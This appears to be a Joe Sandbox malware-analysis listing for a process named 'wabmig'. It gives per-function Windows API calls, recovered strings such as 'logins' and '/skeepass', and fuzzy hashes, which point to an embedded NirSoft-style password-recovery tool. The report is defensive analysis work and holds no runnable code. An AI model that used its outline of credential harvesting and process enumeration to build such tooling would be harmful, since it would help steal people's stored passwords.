                                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                              • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                              • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                              • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                              • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                              • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                              • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                              • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                              • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                              • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                                            • String ID: logins$null
                                                                            • API String ID: 2148543256-2163367763
                                                                            APIs
                                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                            • memset.MSVCRT ref: 004085CF
                                                                            • memset.MSVCRT ref: 004085F1
                                                                            • memset.MSVCRT ref: 00408606
                                                                            • strcmp.MSVCRT ref: 00408645
                                                                            • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                            • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                            • memset.MSVCRT ref: 0040870E
                                                                            • strcmp.MSVCRT ref: 0040876B
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                            • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                            Similarity
                                                                            • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                            • String ID: ---
                                                                            • API String ID: 3437578500-2854292027
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0041087D
                                                                            • memset.MSVCRT ref: 00410892
                                                                            • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                            • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                            • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                            • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                            • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                            • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                            • GetSysColor.USER32(0000000F), ref: 00410999
                                                                            • DeleteObject.GDI32(?), ref: 004109D0
                                                                            • DeleteObject.GDI32(?), ref: 004109D6
                                                                            • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                            Similarity
                                                                            • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                            • String ID:
                                                                            • API String ID: 1010922700-0
                                                                            APIs
                                                                              • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                            • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                            • malloc.MSVCRT ref: 004186B7
                                                                            • free.MSVCRT ref: 004186C7
                                                                            • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                            • free.MSVCRT ref: 004186E0
                                                                            • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                            • malloc.MSVCRT ref: 004186FE
                                                                            • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                            • free.MSVCRT ref: 00418716
                                                                            • free.MSVCRT ref: 0041872A
                                                                            • free.MSVCRT ref: 00418749
                                                                            Similarity
                                                                            • API ID: free$FullNamePath$malloc$Version
                                                                            • String ID: |A
                                                                            • API String ID: 3356672799-1717621600
                                                                            Similarity
                                                                            • API ID: _wcsicmp
                                                                            • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                            • API String ID: 2081463915-1959339147
                                                                            APIs
                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                            • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                            Similarity
                                                                            • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                            • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                            • API String ID: 2012295524-70141382
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                            • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                            • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                            • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                            • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                            • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                            Similarity
                                                                            • API ID: AddressProc$HandleModule
                                                                            • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                            • API String ID: 667068680-3953557276
                                                                            APIs
                                                                            • GetDC.USER32(00000000), ref: 004121FF
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                            • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                            • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                            • SelectObject.GDI32(?,?), ref: 00412251
                                                                            • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                            • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                              • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                              • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                              • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                            • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                            • SetCursor.USER32(00000000), ref: 004122BC
                                                                            • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                            • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                            • String ID:
                                                                            • API String ID: 1700100422-0
                                                                            • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                            • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                            • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                            • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                            APIs
                                                                            • GetClientRect.USER32(?,?), ref: 004111E0
                                                                            • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                            • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                            • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                            • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                            • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                            • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                            • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                            • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                            • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                            • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                            • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                            • String ID:
                                                                            • API String ID: 552707033-0
                                                                            • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                            • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                            • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                            • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                            APIs
                                                                            • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                                              • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                            • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                              • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                              • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                            • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                            • strchr.MSVCRT ref: 0040C140
                                                                            • strchr.MSVCRT ref: 0040C151
                                                                            • _strlwr.MSVCRT ref: 0040C15F
                                                                            • memset.MSVCRT ref: 0040C17A
                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                                            • String ID: 4$h
                                                                            • API String ID: 4066021378-1856150674
                                                                            • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                            • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                            • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                            • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memset$_snwprintf
                                                                            • String ID: %%0.%df
                                                                            • API String ID: 3473751417-763548558
                                                                            • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                            • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                                            • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                                            • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                                            APIs
                                                                            • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                            • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                            • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                            • GetTickCount.KERNEL32 ref: 0040610B
                                                                            • GetParent.USER32(?), ref: 00406136
                                                                            • SendMessageW.USER32(00000000), ref: 0040613D
                                                                            • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                            • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                            • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                            • String ID: A
                                                                            • API String ID: 2892645895-3554254475
                                                                            • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                            • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                            • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                            • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                            APIs
                                                                            • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                              • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                              • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                              • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                              • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                            • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                            • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                            • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                            • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                            • memset.MSVCRT ref: 0040DA23
                                                                            • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                            • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                            • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                              • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                            • String ID: caption
                                                                            • API String ID: 973020956-4135340389
                                                                            • Opcode ID: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                            • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                                                            • Opcode Fuzzy Hash: 5e414436bb8e275bf9a16e2693900a7463b03ad76ebaf029bad5c7ef584cf34d
                                                                            • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                                                            APIs
                                                                            Strings
                                                                            • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                            • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                            • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                            • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memset$_snwprintf$wcscpy
                                                                            • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                            • API String ID: 1283228442-2366825230
                                                                            • Opcode ID: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                            • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                                                            • Opcode Fuzzy Hash: 2928c1e4db6f8540118cb54ef1ff53e3c28d5a36283f281326c9c00f9b8dcb63
                                                                            • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                                                            APIs
                                                                            • wcschr.MSVCRT ref: 00413972
                                                                            • wcscpy.MSVCRT ref: 00413982
                                                                              • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                              • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                              • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                            • wcscpy.MSVCRT ref: 004139D1
                                                                            • wcscat.MSVCRT ref: 004139DC
                                                                            • memset.MSVCRT ref: 004139B8
                                                                              • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                              • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                            • memset.MSVCRT ref: 00413A00
                                                                            • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                            • wcscat.MSVCRT ref: 00413A27
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                            • String ID: \systemroot
                                                                            • API String ID: 4173585201-1821301763
                                                                            • Opcode ID: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                            • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                                                            • Opcode Fuzzy Hash: e4551322c16c9acef98fc86a4838192e22c045fa3321ccd57a54cdfa3ae28df9
                                                                            • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: wcscpy
                                                                            • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                            • API String ID: 1284135714-318151290
                                                                            • Opcode ID: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                            • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                                                            • Opcode Fuzzy Hash: dc6868dd8f5dbcd850853512a46c22a4be17f2be4da4ff30984607c28efcaa9d
                                                                            • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                                            • String ID: 0$6
                                                                            • API String ID: 4066108131-3849865405
                                                                            • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                            • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                                            • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                                            • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                                            APIs
                                                                            • memset.MSVCRT ref: 004082EF
                                                                              • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                            • memset.MSVCRT ref: 00408362
                                                                            • memset.MSVCRT ref: 00408377
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memset$ByteCharMultiWide
                                                                            • String ID:
                                                                            • API String ID: 290601579-0
                                                                            • Opcode ID: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                                            • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                            • Opcode Fuzzy Hash: 0f4830a1bd5c139c57c95e775b3a7e0dd93a0ba2de61a1ec6096e44496360a03
                                                                            • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                            APIs
                                                                            • memchr.MSVCRT ref: 00444EBF
                                                                            • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                            • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                            • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                            • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                                                            • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                                                            • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                                                            • memset.MSVCRT ref: 0044505E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy$memchrmemset
                                                                            • String ID: PD$PD
                                                                            • API String ID: 1581201632-2312785699
                                                                            • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                            • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                            • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                            • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                            APIs
                                                                            • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                            • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                            • GetDC.USER32(00000000), ref: 00409F6E
                                                                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                            • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                            • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                            • GetParent.USER32(?), ref: 00409FA5
                                                                            • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                            • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                            • String ID:
                                                                            • API String ID: 2163313125-0
                                                                            • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                            • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                            • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                            • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000011.00000002.2456821504.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_17_2_400000_wabmig.jbxd
                                                                            Similarity
                                                                            • API ID: free$wcslen
                                                                            • String ID:
                                                                            • API String ID: 3592753638-3916222277
                                                                            • Opcode ID: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                            • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                            • Opcode Fuzzy Hash: c7ce2940fe04b4405a0b219ffbd3b3dbc0b14a035c74dd75871d5eb09ab59b8c
                                                                            • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040A47B
                                                                            • _snwprintf.MSVCRT ref: 0040A4AE
                                                                            • wcslen.MSVCRT ref: 0040A4BA
                                                                            • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                            • wcslen.MSVCRT ref: 0040A4E0
